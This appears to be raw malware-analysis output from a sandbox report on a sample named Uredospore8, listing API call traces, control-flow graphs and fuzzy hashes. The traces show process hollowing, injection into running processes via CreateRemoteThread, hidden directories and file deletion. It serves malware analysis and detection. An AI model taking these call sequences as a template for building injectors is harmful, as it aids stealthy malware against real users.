3535->3540 3541 6d4122 3536->3541 3538->3529 3540->3538 3542 6d377f 3541->3542 3543 6d4127 GetModuleHandleA 3542->3543 3544 6d4101 Sleep 3543->3544 3545 6d4131 3543->3545 3546 6d4122 7 API calls 3544->3546 3547 6d4142 7 API calls 3545->3547 3548 6d411c 3546->3548 3549 6d413b 3547->3549 3550 6d411c 3549->3550 3552 6d41c1 3549->3552 3554 6d41d4 3552->3554 3553 6d423d 3553->3550 3554->3553 3555 6d4241 7 API calls 3554->3555 3555->3553 3315 6d3e7b 3316 6d377f 3315->3316 3317 6d3e80 LoadLibraryA 3316->3317 3318 6d0d01 GetProcAddress 3317->3318 3319 6d3e96 3318->3319 3334 6d13aa 3319->3334 3322 6d13aa 3 API calls 3323 6d3ec8 3322->3323 3324 6d13aa 3 API calls 3323->3324 3325 6d3ee1 3324->3325 3326 6d13aa 3 API calls 3325->3326 3327 6d3efa 3326->3327 3328 6d13aa 3 API calls 3327->3328 3329 6d3f13 3328->3329 3330 6d13aa 3 API calls 3329->3330 3331 6d3f2c 3330->3331 3332 6d13aa 3 API calls 3331->3332 3333 6d3f45 3332->3333 3335 6d13bd 3334->3335 3336 6d1459 3334->3336 3335->3336 3337 6d13c9 VirtualProtect 3335->3337 3336->3322 3337->3336 3338 6d13e1 VirtualAlloc 3337->3338 3338->3338 3339 6d13f6 3338->3339 3340 6d1425 VirtualProtect 3339->3340 3340->3336 3341 6d3974 3343 6d3982 3341->3343 3346 6d3993 3343->3346 3349 6d39af 3346->3349 3359 6d39dc 3346->3359 3365 6d39fa 3346->3365 3348 6d39e9 Sleep 3348->3346 3350 6d39b4 3349->3350 3351 6d39fa 12 API calls 3350->3351 3352 6d39c0 3351->3352 3353 6d39dc 13 API calls 3352->3353 3354 6d3993 3352->3354 3353->3354 3355 6d39fa 12 API calls 3354->3355 3357 6d39af 13 API calls 3354->3357 3358 6d39dc 13 API calls 3354->3358 3356 6d39e9 Sleep 3355->3356 3356->3354 3357->3354 3358->3354 3360 6d3993 3359->3360 3360->3359 3361 6d39fa 12 API calls 3360->3361 3363 6d39af 13 API calls 3360->3363 3364 6d39dc 13 API calls 3360->3364 3362 6d39e9 Sleep 3361->3362 3362->3360 3363->3360 3364->3360 3366 6d2656 7 API calls 3365->3366 3367 6d3a14 lstrcat 3366->3367 3368 6d26f1 4 API calls 3367->3368 3369 6d3a3f 3368->3369 3369->3348 3556 6d32b3 3557 6d32b8 3556->3557 3558 6d2605 2 API calls 3557->3558 3559 6d3309 lstrcat 3558->3559 3560 6d3316 3559->3560 3561 6d2764 4 API calls 3560->3561 3562 6d3344 3561->3562 3563 6d334a GetStartupInfoA CreateProcessA CloseHandle CloseHandle 3562->3563 3564 6d33a2 3562->3564 3563->3564 3370 6d35f2 lstrlen 3371 6d27d7 11 API calls 3370->3371 3372 6d360b VirtualFree CloseHandle 3371->3372
              APIs
                • Part of subcall function 006D09CC: OpenMutexA.KERNEL32(001F0001,00000000), ref: 006D09E6
                • Part of subcall function 006D09CC: GetStartupInfoA.KERNEL32(00000000), ref: 006D09FE
              • ExitProcess.KERNEL32(00000000), ref: 006D001D
              Memory Dump Source
              • Source File: 00000002.00000002.2215999535.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_6d0000_Uredospore8.jbxd
              Similarity
              • API ID: ExitInfoMutexOpenProcessStartup
              • String ID:
              • API String ID: 213680645-0
              • Opcode ID: b109e0e9e5e5c88f701885a31cc478c2ab5e3d8aff70cddd800b113599f869bd
              • Instruction ID: 11e096ea943061a4108c8d5c31f791fda2210976cb0c9ba137509a3e0147be83
              • Opcode Fuzzy Hash: b109e0e9e5e5c88f701885a31cc478c2ab5e3d8aff70cddd800b113599f869bd
              • Instruction Fuzzy Hash: 0872B161C4E3C05FEB179B704A657A67FBAAE53300F1900CBD9C1DB3A3D1149A19C76A

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 436 401000-401009 437 40100c-401018 436->437 437->437 438 40101a-40102c 437->438 439 40102e-40103d 438->439 439->439 440 40103f-401043 439->440 440->439 441 401045-401068 VirtualAlloc call 40106d 440->441
              APIs
              • VirtualAlloc.KERNELBASE(00000000,00A00000,00003000,00000040), ref: 00401064
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2212687252.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_Uredospore8.jbxd
              Similarity
              • API ID: AllocVirtual
              • String ID: alAl
              • API String ID: 4275171209-1316302345
              • Opcode ID: a080b2c6f743f0a70159d360efd7c7be18896e261b6016ba325860d891afe58b
              • Instruction ID: ecc63617fdaeb7cb87c49a60ff0bd2d1c41ed41399276595c5389e0fe46cd30a
              • Opcode Fuzzy Hash: a080b2c6f743f0a70159d360efd7c7be18896e261b6016ba325860d891afe58b
              • Instruction Fuzzy Hash: 88014F76A401518FD764CF64C841F11B3E1BF44325F1A81A5D989AB7A2D778FC92CF84

              Control-flow Graph

              APIs
              • Sleep.KERNEL32(00001388), ref: 006D09BE
              • RtlExitUserThread.NTDLL(00000000), ref: 006D09C6
              • OpenMutexA.KERNEL32(001F0001,00000000), ref: 006D09E6
              • GetStartupInfoA.KERNEL32(00000000), ref: 006D09FE
                • Part of subcall function 006D0A3E: CreateProcessA.KERNELBASE(00000000,006D0A37,00000007,?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,00000000), ref: 006D0A45
                • Part of subcall function 006D0A3E: Wow64GetThreadContext.KERNEL32(?,00000000), ref: 006D0A6D
                • Part of subcall function 006D0A3E: VirtualProtectEx.KERNELBASE(?,?,000000EB,00000040,00000000), ref: 006D0A98
                • Part of subcall function 006D0A3E: DuplicateHandle.KERNELBASE(000000FF,000000FF,?,006D59EC,00000000,00000000,00000002), ref: 006D0ADD
                • Part of subcall function 006D0A3E: WriteProcessMemory.KERNELBASE(?,?,?,000000EB,00000000), ref: 006D0B0B
                • Part of subcall function 006D0A3E: ResumeThread.KERNELBASE(?), ref: 006D0B1B
                • Part of subcall function 006D0A3E: Sleep.KERNELBASE(000003E8), ref: 006D0B2B
                • Part of subcall function 006D0A3E: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 006D0B42
              Memory Dump Source
              • Source File: 00000002.00000002.2215999535.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_6d0000_Uredospore8.jbxd
              Similarity
              • API ID: Thread$MutexOpenProcessSleep$ContextCreateDuplicateExitHandleInfoMemoryProtectResumeStartupUserVirtualWow64Write
              • String ID:
              • API String ID: 1555264186-0
              • Opcode ID: 4974744534687c6ca16bfdd406f1a9e76377cc43cabe4b36b7facf944e6376f6
              • Instruction ID: 8766967e533a52f02cac2bbcfe643286abb01353f95ed1254e16aabba067847b
              • Opcode Fuzzy Hash: 4974744534687c6ca16bfdd406f1a9e76377cc43cabe4b36b7facf944e6376f6
              • Instruction Fuzzy Hash: 9541A371A40214AFFF229F60CC85FA973BDEF04744F040196BA49FE1D6DAB09A90CE65

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 423 6d0a3e-6d0a4d call 6d377f CreateProcessA 426 6d0b51 call 6d0b58 423->426 427 6d0a53-6d0a75 Wow64GetThreadContext 423->427 430 6d0b56-6d0b57 426->430 427->426 429 6d0a7b-6d0aa0 VirtualProtectEx 427->429 429->426 431 6d0aa6-6d0ae5 DuplicateHandle 429->431 431->426 432 6d0ae7-6d0b13 WriteProcessMemory 431->432 432->426 433 6d0b15-6d0b21 ResumeThread 432->433 434 6d0b26-6d0b4a Sleep OpenMutexA 433->434 434->430 435 6d0b4c-6d0b4f 434->435 435->426 435->434
              APIs
              • CreateProcessA.KERNELBASE(00000000,006D0A37,00000007,?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,00000000), ref: 006D0A45
              • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 006D0A6D
              • VirtualProtectEx.KERNELBASE(?,?,000000EB,00000040,00000000), ref: 006D0A98
              • DuplicateHandle.KERNELBASE(000000FF,000000FF,?,006D59EC,00000000,00000000,00000002), ref: 006D0ADD
              • WriteProcessMemory.KERNELBASE(?,?,?,000000EB,00000000), ref: 006D0B0B
              • ResumeThread.KERNELBASE(?), ref: 006D0B1B
              • Sleep.KERNELBASE(000003E8), ref: 006D0B2B
              • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 006D0B42
              Memory Dump Source
              • Source File: 00000002.00000002.2215999535.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_6d0000_Uredospore8.jbxd
              Similarity
              • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWow64Write
              • String ID:
              • API String ID: 1738979855-0
              • Opcode ID: beeeac3a1acd6789deb01cd9b1c0b660ec5e97df5daadee7f8ea6533514987fe
              • Instruction ID: 18c9192235e10ad87d859b00b5427153c1caa84ca467e46d96c0069ac52888aa
              • Opcode Fuzzy Hash: beeeac3a1acd6789deb01cd9b1c0b660ec5e97df5daadee7f8ea6533514987fe
              • Instruction Fuzzy Hash: 5F314F31A441149FFF228F10CC89BA977B9EF04744F0805D6AA49FE2E5DBB19A90CE64

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 443 6d3511-6d356a GetVolumeInformationA call 6d373c
              APIs
              • GetVolumeInformationA.KERNELBASE(006D350D,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000104), ref: 006D3511
              Memory Dump Source
              • Source File: 00000002.00000002.2215999535.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_6d0000_Uredospore8.jbxd
              Similarity
              • API ID: InformationVolume
              • String ID:
              • API String ID: 2039140958-0
              • Opcode ID: 75d61119e64eb4024ce7cba51b093e69c9fa78e48c1200fbb9e5cf187241dc42
              • Instruction ID: fcc54133466bdaf6874b81d1f9fc9d4d351954ef25812920638f207cd98dad9a
              • Opcode Fuzzy Hash: 75d61119e64eb4024ce7cba51b093e69c9fa78e48c1200fbb9e5cf187241dc42
              • Instruction Fuzzy Hash: 88F0F8B5900154DBEF02EF64C485A9A7BB8AF44305F4515C9AE4DBF20ACB30A6598F68

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 664 6d0e45-6d0e73 VirtualAllocEx 665 6d0edb-6d0ede 664->665 666 6d0e75-6d0e91 WriteProcessMemory 664->666 666->665 667 6d0e93-6d0e98 666->667 668 6d0e9a-6d0ea8 IsWow64Process 667->668 669 6d0ec5-6d0ed5 CreateRemoteThread 667->669 668->669 670 6d0eaa-6d0ec3 668->670 669->665 670->665
              APIs
              • VirtualAllocEx.KERNEL32(0000094C,00000000,006D59EC,00003000,00000040,?,?,?,006D0DED,00000000,0000094C,00000000), ref: 006D0E6B
              • WriteProcessMemory.KERNEL32(0000094C,006D0024,00000000,006D59EC,00000000,?,006D0DED,00000000,0000094C,00000000), ref: 006D0E89
              • IsWow64Process.KERNEL32(0000094C,?,?,?,006D0DED,00000000,0000094C,00000000), ref: 006D0E9F
              • CreateRemoteThread.KERNEL32(0000094C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006D0ED5
              Memory Dump Source
              • Source File: 00000002.00000002.2215999535.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_6d0000_Uredospore8.jbxd
              Similarity
              • API ID: Process$AllocCreateMemoryRemoteThreadVirtualWow64Write
              • String ID:
              • API String ID: 3578747408-0
              • Opcode ID: 73a63156dcc240dfd57774f03aa3cf0bcc04f9305a5d11e370546c377752cf19
              • Instruction ID: b6823fd75befb6d50f656db90e8169b41c6d7af9b37e3be228c85aa06840bfb9
              • Opcode Fuzzy Hash: 73a63156dcc240dfd57774f03aa3cf0bcc04f9305a5d11e370546c377752cf19
              • Instruction Fuzzy Hash: 68114F32500205FBFF205F15CC45F963B69EF80754F144411FE05BE295E771A561CAA8
              Memory Dump Source
              • Source File: 00000002.00000002.2215999535.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_6d0000_Uredospore8.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a1623424573e6be2acb58b4229fdfae1f6709ba4e7e5bf64a309903e243988e7
              • Instruction ID: aea0eddfcb99bbdae678f8b07e1610e594d997339e2e547b3fdfa0bfb0b49c12
              • Opcode Fuzzy Hash: a1623424573e6be2acb58b4229fdfae1f6709ba4e7e5bf64a309903e243988e7
              • Instruction Fuzzy Hash: 09C080731041095F9300CE59D841D56F35DEFC1364328C331E105C6146C178E491D7E9

              Control-flow Graph

              APIs
              • LoadLibraryA.KERNEL32(006D06A3,00000009,?,00000000), ref: 006D06B1
                • Part of subcall function 006D0D01: GetProcAddress.KERNEL32(00000000,006D04D5), ref: 006D0D0E
                • Part of subcall function 006D06F2: lstrcat.KERNEL32(00000000,006D06E9), ref: 006D0701
                • Part of subcall function 006D06F2: lstrcmpiA.KERNEL32(?,00000000), ref: 006D071B
                • Part of subcall function 006D06F2: Sleep.KERNEL32(00001388), ref: 006D072E
                • Part of subcall function 006D06F2: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 006D074F
                • Part of subcall function 006D06F2: SetFileAttributesA.KERNEL32(00000000,00000002), ref: 006D0761
                • Part of subcall function 006D06F2: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 006D0782
                • Part of subcall function 006D06F2: SetFileAttributesA.KERNEL32(00000000,00000002), ref: 006D0794
                • Part of subcall function 006D06F2: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 006D07B5
                • Part of subcall function 006D06F2: SetFileAttributesA.KERNEL32(00000000,00000002), ref: 006D07C7
                • Part of subcall function 006D06F2: VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 006D07DB
                • Part of subcall function 006D06F2: VirtualFree.KERNEL32(00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00100000), ref: 006D0822
                • Part of subcall function 006D06F2: Sleep.KERNEL32(00001388), ref: 006D0841
              Memory Dump Source
              • Source File: 00000002.00000002.2215999535.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_6d0000_Uredospore8.jbxd
              Similarity
              • API ID: AttributesCreateDirectoryFile$SleepVirtual$AddressAllocFreeLibraryLoadProclstrcatlstrcmpi
              • String ID:
              • API String ID: 3164464694-0
              • Opcode ID: c20eeef422c49ef5dacc71178ffe2c9559f1b83162b6f5b3ac7459e8ac5b62c8
              • Instruction ID: 0517ad4d0db39fe2677d796e23e6ecfe2f729d6c706fa3b756c5d075ccc935b3
              • Opcode Fuzzy Hash: c20eeef422c49ef5dacc71178ffe2c9559f1b83162b6f5b3ac7459e8ac5b62c8
              • Instruction Fuzzy Hash: 6B4104B29042149FEF526B608C89F9A77BDEF44700F45059EBB85EF146EE309580CBA9

              Control-flow Graph

              APIs
              • lstrcat.KERNEL32(00000000,006D06E9), ref: 006D0701
              • lstrcmpiA.KERNEL32(?,00000000), ref: 006D071B
              • Sleep.KERNEL32(00001388), ref: 006D072E
              • CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 006D074F
              • SetFileAttributesA.KERNEL32(00000000,00000002), ref: 006D0761
              • CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 006D0782
              • SetFileAttributesA.KERNEL32(00000000,00000002), ref: 006D0794
              • CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 006D07B5
              • SetFileAttributesA.KERNEL32(00000000,00000002), ref: 006D07C7
              • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 006D07DB
              • VirtualFree.KERNEL32(00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00100000), ref: 006D0822
              • Sleep.KERNEL32(00001388), ref: 006D0841
              Memory Dump Source
              • Source File: 00000002.00000002.2215999535.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_6d0000_Uredospore8.jbxd
              Similarity
              • API ID: AttributesCreateDirectoryFile$SleepVirtual$AllocFreelstrcatlstrcmpi
              • String ID:
              • API String ID: 2622802024-0
              • Opcode ID: 2d5341e2d3486ad8ae313cfc35730e242c1b71eebb05ac8df6fd9b5554d17158
              • Instruction ID: 0f23531775a1e81fc46949e6a7fb5a7c341413a6ea5a8836b0e50f9c511a4061
              • Opcode Fuzzy Hash: 2d5341e2d3486ad8ae313cfc35730e242c1b71eebb05ac8df6fd9b5554d17158
              • Instruction Fuzzy Hash: EA3103B29042149FEF566B608C89F9A73BDEF44700F45049EBB85EF145DE309680CEA9

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 507 6d268a-6d2698 call 6d377f ExpandEnvironmentStringsA 510 6d269a-6d26a2 call 6d2605 507->510 511 6d26a4-6d26ae 507->511 516 6d26ed-6d26ee 510->516 513 6d26da-6d26e7 lstrcat 511->513 514 6d26b0-6d26d4 call 6d26cc lstrcat 511->514 513->516 514->513
              APIs
              • ExpandEnvironmentStringsA.KERNEL32(006D267A,00000010,?,?,00000000,00000104), ref: 006D268F
              • lstrcat.KERNEL32(00000000,006D26C7), ref: 006D26D4
              • lstrcat.KERNEL32(00000000,00000000), ref: 006D26E7
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2215999535.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_6d0000_Uredospore8.jbxd
              Similarity
              • API ID: lstrcat$EnvironmentExpandStrings
              • String ID: \AC\
              • API String ID: 2903145849-1749977576
              • Opcode ID: 9add6d2c685be6ba9b11d7ae33e1f8ee7394e656f3ace74048cbccfc4307d2af
              • Instruction ID: 4b7f375645103273f80660f79e6e5b209e73925a33936798e93832d171b36759
              • Opcode Fuzzy Hash: 9add6d2c685be6ba9b11d7ae33e1f8ee7394e656f3ace74048cbccfc4307d2af
              • Instruction Fuzzy Hash: 5021927190024AEFEF119F60CC59B9DBBB5FF20704F14409AED54EE2A1D7308A65DB64

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 520 6d0d4d-6d0d62 521 6d0d68-6d0d75 CreateToolhelp32Snapshot 520->521 521->521 522 6d0d77-6d0daa Sleep Process32First 521->522 523 6d0dac-6d0db8 522->523 524 6d0e1a-6d0e40 CloseHandle Sleep 522->524 525 6d0db9-6d0dc8 523->525 524->521 526 6d0dca-6d0ddf OpenProcess 525->526 527 6d0df3-6d0e0b Process32Next 525->527 526->527 529 6d0de1-6d0ded call 6d0e45 CloseHandle 526->529 527->524 528 6d0e0d-6d0e0f 527->528 528->525 530 6d0e11-6d0e18 528->530 529->527 530->525
              APIs
              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006D0D6C
              • Sleep.KERNEL32(000003E8), ref: 006D0D82
              • Process32First.KERNEL32(?,00000000), ref: 006D0DA2
              • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 006D0DD7
              • CloseHandle.KERNEL32(00000000,0000094C,00000000), ref: 006D0DED
              • Process32Next.KERNEL32(?,?), ref: 006D0E03
              • CloseHandle.KERNEL32(?), ref: 006D0E2F
              • Sleep.KERNEL32(000003E8), ref: 006D0E3A
              Memory Dump Source
              • Source File: 00000002.00000002.2215999535.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_6d0000_Uredospore8.jbxd
              Similarity
              • API ID: CloseHandleProcess32Sleep$CreateFirstNextOpenProcessSnapshotToolhelp32
              • String ID:
              • API String ID: 2496627043-0
              • Opcode ID: 1d14222e008f5e06e437f4b2d3671cdf3121152bf9a7f5596c02336e82120a0a
              • Instruction ID: 262c90d834cb772e4f757be0fbe6136132d40962fff6acdfbbca4cd3786595ff
              • Opcode Fuzzy Hash: 1d14222e008f5e06e437f4b2d3671cdf3121152bf9a7f5596c02336e82120a0a
              • Instruction Fuzzy Hash: 2E219035901118ABFF225F54CC54BE9B7BAFF08700F1801DAE909EA291CA309E508F54

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 533 6d2aac-6d2ab9 call 6d377f 537 6d2abb-6d2ad5 call 6d2bdf call 6d3623 533->537 538 6d2a82-6d2aab Sleep call 6d2aac 533->538 544 6d2ada-6d2ae1 537->544 544->537 545 6d2ae3-6d2aff call 6d356b call 6d26f1 544->545 550 6d2b2c-6d2b43 call 6d26f1 545->550 551 6d2b01 545->551 556 6d2b45 550->556 557 6d2b70-6d2b87 call 6d26f1 550->557 551->550 552 6d2b03-6d2b18 call 6d2764 551->552 552->550 561 6d2b1a 552->561 556->557 559 6d2b47-6d2b5c call 6d2764 556->559 566 6d2b89 557->566 567 6d2b8a-6d2ba3 call 6d2fb7 557->567 559->557 568 6d2b5e 559->568 561->550 564 6d2b1c-6d2b26 DeleteFileA 561->564 564->550 566->567 572 6d2ba5-6d2bae call 6d3177 567->572 573 6d2bc6-6d2bda Sleep 567->573 568->557 570 6d2b60-6d2b6a DeleteFileA 568->570 570->557 572->573 576 6d2bb0-6d2bc0 DeleteFileA 572->576 573->544 576->573
              APIs
              • Sleep.KERNEL32(00000064), ref: 006D2A84
                • Part of subcall function 006D2BDF: Sleep.KERNEL32(00002710), ref: 006D2C50
              • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 006D2B26
              • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 006D2B6A
              • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 006D2BC0
              • Sleep.KERNEL32(03E80032,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 006D2BD4
              Memory Dump Source
              • Source File: 00000002.00000002.2215999535.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_6d0000_Uredospore8.jbxd
              Similarity
              • API ID: DeleteFileSleep
              • String ID:
              • API String ID: 3161721237-0
              • Opcode ID: ccc77a8dcdda45c6555d732deb7b8c046add19b0ac98e93311101b284191132d
              • Instruction ID: 59b6c4f25c0c8f198e7affaaab457013fdecb80149cef5c66d2237d141675706
              • Opcode Fuzzy Hash: ccc77a8dcdda45c6555d732deb7b8c046add19b0ac98e93311101b284191132d
              • Instruction Fuzzy Hash: B6317771D003565EDF626F708C59FAB77BDEFA0708F00089BB945D6241DA70D680CEA5

              Control-flow Graph

              APIs
              • lstrcat.KERNEL32(00000000,00000000), ref: 006D330A
              • GetStartupInfoA.KERNEL32(00000000), ref: 006D3354
              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,006D32D5,00000011,?,00000000,00A00000), ref: 006D3381
              • CloseHandle.KERNEL32(?,?,006D32D5,00000011,?,00000000,00A00000,00A00000,006D318E,00000004,00000000), ref: 006D338D
              • CloseHandle.KERNEL32(?,?,006D32D5,00000011,?,00000000,00A00000,00A00000,006D318E,00000004,00000000), ref: 006D3399
              Memory Dump Source
              • Source File: 00000002.00000002.2215999535.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_6d0000_Uredospore8.jbxd
              Similarity
              • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
              • String ID:
              • API String ID: 3387338972-0
              • Opcode ID: 8a98a979b3afe01a6b6469a2d28bd76d619105e30e33d273b309531e6d902268
              • Instruction ID: daaf3fb9eb2b67e7c11b9d1df21a090bc1a090085a3a9aff1bc5c4a765f1f9d5
              • Opcode Fuzzy Hash: 8a98a979b3afe01a6b6469a2d28bd76d619105e30e33d273b309531e6d902268
              • Instruction Fuzzy Hash: 0211A5B2C005649FEF526B20CD85FEFB7FDEF50305F0144AAE985E6205DA349A80CE96

              Control-flow Graph

              APIs
              • lstrcat.KERNEL32(00000000,00000000), ref: 006D330A
              • GetStartupInfoA.KERNEL32(00000000), ref: 006D3354
              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,006D32D5,00000011,?,00000000,00A00000), ref: 006D3381
              • CloseHandle.KERNEL32(?,?,006D32D5,00000011,?,00000000,00A00000,00A00000,006D318E,00000004,00000000), ref: 006D338D
              • CloseHandle.KERNEL32(?,?,006D32D5,00000011,?,00000000,00A00000,00A00000,006D318E,00000004,00000000), ref: 006D3399
              Memory Dump Source
              • Source File: 00000002.00000002.2215999535.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_6d0000_Uredospore8.jbxd
              Similarity
              • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
              • String ID:
              • API String ID: 3387338972-0
              • Opcode ID: 1ed0a1048e4db589b072e246fe77845ab2280c6c5e036d8c10e77b5e41e76f05
              • Instruction ID: 5fffa541b11b03ffed4ee0472e7389f5fff3e4fc0e2bdf99ea684dfe2e4b4e47
              • Opcode Fuzzy Hash: 1ed0a1048e4db589b072e246fe77845ab2280c6c5e036d8c10e77b5e41e76f05
              • Instruction Fuzzy Hash: 8C118472C045649EDF52AB20CD45BDFB7FDEF50305F0144AAE985E6105DA349A80CE96

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 672 6d26f1-6d2714 CreateFileA 673 6d2716-6d272d GetFileSize 672->673 674 6d2760-6d2761 672->674 675 6d272f 673->675 676 6d2754-6d275d CloseHandle 673->676 675->676 677 6d2731-6d2734 675->677 676->674 677->676 678 6d2736-6d274e ReadFile 677->678 678->676 679 6d2750-6d2751 678->679 679->676
              APIs
              • CreateFileA.KERNEL32(?,80000000,00000003,00000005,?,00000000), ref: 006D270C
              • GetFileSize.KERNEL32(?,00000000), ref: 006D2725
              • ReadFile.KERNEL32(?,?,FFFFFFFF,?,00000000), ref: 006D2746
              • CloseHandle.KERNEL32(?), ref: 006D2757
              Memory Dump Source
              • Source File: 00000002.00000002.2215999535.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_6d0000_Uredospore8.jbxd
              Similarity
              • API ID: File$CloseCreateHandleReadSize
              • String ID:
              • API String ID: 3919263394-0
              • Opcode ID: f05718e99d369eac40e2690169d296b8b40b30d56a66f1f0090856645f6f71ca
              • Instruction ID: a2d815c58c0fe4babcfd56c13a18cf2c4c965670ca632ec4dface75d0fff65be
              • Opcode Fuzzy Hash: f05718e99d369eac40e2690169d296b8b40b30d56a66f1f0090856645f6f71ca
              • Instruction Fuzzy Hash: A801EC30A40209FBEF259F50CC55B9DBAB5EF10B45F1041A5AA14F92E0D7709A259A54
              APIs
              • CreateFileA.KERNEL32(00100000,40000000,00000003,00000000,?,00000080,00000000,00100000), ref: 006D2780
              • SetFilePointer.KERNEL32(00000002,00000000,00000000,00000002), ref: 006D279D
              • WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 006D27B9
              • CloseHandle.KERNEL32(?), ref: 006D27CA
              Memory Dump Source
              • Source File: 00000002.00000002.2215999535.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_6d0000_Uredospore8.jbxd
              Similarity
              • API ID: File$CloseCreateHandlePointerWrite
              • String ID:
              • API String ID: 3604237281-0
              • Opcode ID: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
              • Instruction ID: 472c7d666bb7b8275a0c4896507439a39f14ac1ddb65ba1a0befee6a64054051
              • Opcode Fuzzy Hash: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
              • Instruction Fuzzy Hash: 0101FB30A40209BFEF219FA0CC45F9D7EB5BF04B04F104169BA54BD1E1D770AA60AB54
              APIs
              • GetModuleHandleA.KERNEL32(00000000,00000000,?,006D3FF8,0000000A,?,00000000,0000000A), ref: 006D4022
              • Sleep.KERNEL32(000003E8,00000000,?,006D3FF8,0000000A,?,00000000,0000000A), ref: 006D4044
              • Sleep.KERNEL32(000007D0), ref: 006D4054
              • Sleep.KERNEL32(00000BB8), ref: 006D4064
              Memory Dump Source
              • Source File: 00000002.00000002.2215999535.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_6d0000_Uredospore8.jbxd
              Similarity
              • API ID: Sleep$HandleModule
              • String ID:
              • API String ID: 3646095425-0
              • Opcode ID: 2260b28b3e21410e304e733389a9bb5d28d906a68a869efffc2975d072b34b11
              • Instruction ID: 9132a48924edee932d0dd1354bfb33608a445811093038bcad4131f5d62932e9
